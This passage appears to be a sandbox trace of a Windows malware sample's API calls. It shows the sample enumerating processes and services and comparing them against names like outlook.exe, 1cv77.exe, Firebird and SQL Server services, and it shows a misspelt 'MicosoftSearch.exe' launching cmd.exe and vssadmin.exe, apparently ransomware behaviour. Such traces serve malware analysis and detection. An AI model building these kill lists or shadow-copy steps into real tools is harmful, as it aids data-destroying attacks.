(lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.157] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.157] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.158] lstrlenW (lpString="csrss.exe") returned 9 [0053.158] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.159] lstrlenW (lpString="winlogon.exe") returned 12 [0053.159] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.160] lstrlenW (lpString="services.exe") returned 12 [0053.160] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.161] lstrlenW (lpString="lsass.exe") returned 9 [0053.161] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.161] lstrlenW (lpString="lsm.exe") returned 7 [0053.162] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.162] lstrlenW (lpString="svchost.exe") returned 11 [0053.162] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.163] lstrlenW (lpString="svchost.exe") returned 11 [0053.163] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.164] lstrlenW (lpString="svchost.exe") returned 11 [0053.164] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.165] lstrlenW (lpString="svchost.exe") returned 11 [0053.165] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.166] lstrlenW (lpString="svchost.exe") returned 11 [0053.166] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.518] lstrlenW (lpString="audiodg.exe") returned 11 [0053.518] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.519] lstrlenW (lpString="svchost.exe") returned 11 [0053.519] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.520] lstrlenW (lpString="svchost.exe") returned 11 [0053.520] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.521] lstrlenW (lpString="dwm.exe") returned 7 [0053.521] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.521] lstrlenW (lpString="explorer.exe") returned 12 [0053.521] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.522] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.522] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.523] lstrlenW (lpString="taskhost.exe") returned 12 [0053.523] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.524] lstrlenW (lpString="svchost.exe") returned 11 [0053.524] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.525] lstrlenW (lpString="taskeng.exe") returned 11 [0053.525] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.526] lstrlenW (lpString="taskhost.exe") returned 12 [0053.526] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0053.527] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0053.527] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0053.527] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0053.527] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0053.528] lstrlenW (lpString="sa_shape.exe") returned 12 [0053.528] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0053.529] lstrlenW (lpString="confidence.exe") returned 14 [0053.529] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="jaguar_assist_dictionaries.exe")) returned 1 [0053.530] lstrlenW (lpString="jaguar_assist_dictionaries.exe") returned 30 [0053.530] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="blue.exe")) returned 1 [0053.531] lstrlenW (lpString="blue.exe") returned 8 [0053.531] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="newly debut.exe")) returned 1 [0053.531] lstrlenW (lpString="newly debut.exe") returned 15 [0053.531] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="symbols_garage_parents.exe")) returned 1 [0053.532] lstrlenW (lpString="symbols_garage_parents.exe") returned 26 [0053.532] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="archive.exe")) returned 1 [0053.533] lstrlenW (lpString="archive.exe") returned 11 [0053.533] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="defend.exe")) returned 1 [0053.534] lstrlenW (lpString="defend.exe") returned 10 [0053.534] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arservice.exe")) returned 1 [0053.534] lstrlenW (lpString="arservice.exe") returned 13 [0053.535] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr-programmer.exe")) returned 1 [0053.535] lstrlenW (lpString="rr-programmer.exe") returned 17 [0053.535] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="capability-ethernet-museums.exe")) returned 1 [0053.536] lstrlenW (lpString="capability-ethernet-museums.exe") returned 31 [0053.536] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="twistedmonton.exe")) returned 1 [0053.537] lstrlenW (lpString="twistedmonton.exe") returned 17 [0053.537] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arc plains.exe")) returned 1 [0053.538] lstrlenW (lpString="arc plains.exe") returned 14 [0053.538] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="americahousestip.exe")) returned 1 [0053.538] lstrlenW (lpString="americahousestip.exe") returned 20 [0053.539] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cats-exceed-photo.exe")) returned 1 [0053.539] lstrlenW (lpString="cats-exceed-photo.exe") returned 21 [0053.539] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="medical lectures.exe")) returned 1 [0053.540] lstrlenW (lpString="medical lectures.exe") returned 20 [0053.540] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="electronic.exe")) returned 1 [0053.541] lstrlenW (lpString="electronic.exe") returned 14 [0053.541] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regression.exe")) returned 1 [0053.542] lstrlenW (lpString="regression.exe") returned 14 [0053.542] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="county.exe")) returned 1 [0053.543] lstrlenW (lpString="county.exe") returned 10 [0053.543] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.544] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.544] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0053.545] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0053.545] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x954, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.545] lstrlenW (lpString="cmd.exe") returned 7 [0053.545] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.546] lstrlenW (lpString="conhost.exe") returned 11 [0053.546] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x968, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0053.547] lstrlenW (lpString="vssadmin.exe") returned 12 [0053.547] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0053.548] lstrlenW (lpString="VSSVC.exe") returned 9 [0053.548] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.548] lstrlenW (lpString="svchost.exe") returned 11 [0053.548] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.549] CloseHandle (hObject=0x20c) returned 1 [0053.549] Sleep (dwMilliseconds=0x1f4) [0054.304] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb903b0 [0054.438] EnumServicesStatusExW (in: hSCManager=0xb903b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0054.438] GetLastError () returned 0xea [0054.439] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0054.439] EnumServicesStatusExW (in: hSCManager=0xb903b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0054.440] CloseServiceHandle (hSCObject=0xb903b0) returned 1 [0054.440] lstrlenW (lpString="Appinfo") returned 7 [0054.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.440] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.440] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.440] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.440] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.440] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.440] lstrlenW (lpString="AudioSrv") returned 8 [0054.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.440] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.440] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.440] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.440] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.440] lstrlenW (lpString="BFE") returned 3 [0054.440] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.441] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.441] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.441] lstrlenW (lpString="CryptSvc") returned 8 [0054.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.441] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.441] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.441] lstrlenW (lpString="CscService") returned 10 [0054.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.441] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.441] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.441] lstrlenW (lpString="DcomLaunch") returned 10 [0054.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.441] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.441] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.441] lstrlenW (lpString="Dhcp") returned 4 [0054.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.441] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.441] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.441] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.441] lstrlenW (lpString="Dnscache") returned 8 [0054.441] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.441] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.442] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.442] lstrlenW (lpString="DPS") returned 3 [0054.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.442] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.442] lstrlenW (lpString="eventlog") returned 8 [0054.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.442] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.442] lstrlenW (lpString="EventSystem") returned 11 [0054.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.442] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.442] lstrlenW (lpString="gpsvc") returned 5 [0054.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.442] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.442] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.442] lstrlenW (lpString="iphlpsvc") returned 8 [0054.442] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.442] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.442] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.443] lstrlenW (lpString="LanmanServer") returned 12 [0054.443] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.443] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.443] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.443] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.443] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.443] 